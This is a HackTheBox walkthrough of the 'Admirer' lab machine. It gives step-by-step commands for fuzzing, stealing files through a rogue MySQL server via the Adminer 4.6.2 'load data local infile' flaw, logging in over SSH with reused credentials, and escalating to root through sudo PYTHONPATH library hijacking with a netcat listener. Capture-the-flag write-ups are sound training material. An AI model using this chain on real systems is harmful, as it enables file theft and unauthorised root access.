Admirer HackTheBox WalkThrough
This is Admirer HackTheBox Walkthrough. In this writeup, I have demonstrated step-by-step how I rooted
Admirer HackTheBox machine. Let us know something about this machine. It is a
Linux machine with IP address
10.10.10.187 and difficulty
easy assigned by its maker.
Before starting, connect your PC with VPN and make sure your connectivity with admirer machine by pinging the IP 10.10.10.187. If all correct then start hacking. As usual, I started by scanning the box. Scanning give us an idea how we have to proceed further. Like, it helps in banner grabbing the services running over different ports and sometimes it helps in vulnerability scanning.
Nmap (a port scanner) gave the following result:-
$ nmap -sV -sC -oN admirer_scan 10.10.10.187
Nmap revealed that ports 21, 22 and 80 are open.
Vsftpd on port
SSH on port
Apache2 web server on port
80 are running. Searched available public exploits for
vsftpd 3.0.3 using
searchsploit tool but no exploit is present for this version of vsftpd. Tried anonymous login to ftp using credential
anonymous but login failed. Left it here and moved forward for further enumeration. We have port 80 open so there may be some website hosted on apache2 web server which is running on this port. Ongoing to the URL http://10.10.10.187/, got a web page containing many number of images.
Tried to enumerate more on this page but got no hint. Even, page source did not give any proper hint to proceed further. Checked
robots.txt file and got a disallowed folder named,
admin-dir and a user named
waldo. Added this user to my notes as it can be our potential user. The robots.txt file also gave hints about
creds file inside
Soon I got some hints about these important files, immediately
FUZZED for these files assuming they may be text files.
$wfuzz -c -w /opt/SecLists-master/Discovery/Web-Content/big.txt --sc 200 -u http://10.10.10.187/admin-dir/FUZZ.txt -t 50
Both the files contains many credentials along with lots of potentials usernames and passwords. The useful credentials for us is FTP account creds because we have port no 21 open and ftp server is running on it. The FTP credential is
Login to FTP Account
$ ftp 10.10.10.187
Got two files
html.tar.gz inside the ftp directory. Downloaded them on my local machine using
mget ftp command, to enumerate them further.
ftp> mget dump.sql html.tar.gz //To download both files to local machine
After enumerating contents of all the downloaded files, got some useful information, which I have listed below.
Got information about database name from
Got database username and password from
We have database credential. Since we do not have port
3306 open on admirer machine so, we cannot connect to database remotely. Perhaps, the database credential is useless till now. After properly reading the contents of the file, db_admin.php got some hints
// TODO: Finish implementing this or find a better open source alternative.
I just tried fuzzing to find names of some file using
wfuzz with extensions
$wfuzz -c -w /opt/SecLists-master/Discovery/Web-Content/big.txt -z list,php-txt-html --hc 403,404 -t 100 -u http://10.10.10.187/utility-scripts/FUZZ.FUZ2Z
Fuzzing listed three files namely
phptest.php. After going to URL, http://10.10.10.187/utility-scripts/adminer.php found
login panel of
adminer (a remote Database Administration tools just like PhpMyAdmin written in php language) along with the installed version of Admirer Software, which is
4.6.2. Soon I get information of software and its version, immediately I searched for public exploit. After googling,
admirer 4.6.2 exploit got this article in very first page of the search results. For more info on how this vulnerability works read above article.
A snippet on ‘
how this exploit work’ is attached below.
To exploit this vulnerability I did the following things: –
Configure MySQL Server
1. Installed MySQL server on my local machine (MySQL is present in Kali by default). In other distro, use below command to install.
$apt install default-mysql-server
2. Started MySQL service
$systemctl start mysql
3. Logged in into MySQL server through the default root credential which is username : root & password : ‘ ‘ [Blank]
4. Created a new user dkm through which anyone can access to this server remotely.
MariaDB [(none)]> CREATE USER 'dkm'@'%' IDENTIFIED BY 'mypassword';
5. Grant all privilege to the user dkm to access databases.
MariaDB [(none)]> GRANT ALL PRIVILEGES ON *.* TO 'dkm'@'%';
6. Reload all privileges.
MariaDB [(none)]> FLUSH PRIVILEGES;
7. Created database
admirer and created a table
test inside this database.
MariaDB [(none)]> create database admirer;
MariaDB [(none)]> use admirer;
MariaDB [admirer]> create table test(name varchar(255));
MariaDB [admirer]> exit;
8. Allowed remote hosts to connect to this sql server. We can allow remote connection by changing bind address to
0.0.0.0 instead of
127.0.0.1 in the file
50-server.cnf at directory
9. Restart MySQL Server to apply the changes
$systemctl restart mysql
10. Confirmed the connectivity to the server by logging into the server through the user dkm and password mypassword.
$mysql -u'dkm' -p'mypassword' -h localhost
11. At last, logged in into adminer login panel through the creds of newly created users.
Logged in into MySQL server through the adminer login panel located at URL http://10.10.10.187/utility-scripts/adminer.php by using the credentials as
10.10.14.14 (My tun0 IP)
After login, select
SQL Command option on left pane.
Enter the following commands to load
index.php file and click
load data local infile '../index.php'
into table test
fields terminated by "/n"
For more info about
load data, you can read here.
After the command is successfully executed click,
select on left pane to list the content of the loaded file.
After loading the file
index.php, got the following contents. A snippet of the content is given below.
From above file extracted credential
According to the above file, this credential looks to be for accessing admirer database. However, we do not have any port listening for database connection (confirmed through nmap scan). So tried this credential to login into
SSH account of user
waldo and successfully logged in. This happened because database credential is reused.
Gaining User Access
$ ssh [email protected]
$ whoami && id
Capture User Flag
Finding PrivEsc Vector
sudo -l command revealed that:
User waldo may run the following commands on admirer:
(ALL) SETENV: /opt/scripts/admin_tasks.sh
Alternatively, we can say user waldo may run
admin_tasks.sh script as root.
Since user waldo can run
admin_tasks.sh script with root privilege therefore all the files or commands which are executed inside this script will also have the same level of privilege as root. The function
backup_web() inside admin_tasks.sh calls
backup.py file which is present inside
/opt/scripts/ directory. So when we execute
backup.py will also be executed as root. Since it is calling
shutil library therefore there can be a chance of
Python Library Hijacking.
So here, our privilege escalation vector can be via
Python Library Hijacking. Check this article for more info about PLH.
To perform python library hijacking and getting root shell I did the following things:
Netcat listener in one terminal
$nc -nvlp 1234
And ran the following command in other terminal
$ mkdir /tmp/ethicalhacs
$ nano /tmp/ethicalhacs/shutil.py
$ cat /tmp/ethicalhacs/shutil.py
$ sudo PYTHONPATH=/tmp/ethicalhacs /opt/scripts/admin_tasks.sh
~Choose an option: 6
We can see we have successfully escalated the privilege to admin by
Python Library hijacking.
Capture Root Flag
This was how I rooted to Admirer HackTheBox machine. Thanks for reading this walkthrough. Learnt a lot after rooting this box. Hope you guys have also learnt some new things. Feel free to share your experience in the comment section. For any query and suggestion related to walkthrough, feel free to write us at ethi[email protected].
Really like articles on ethicalhacs.com, you can now support us by buying us coffee.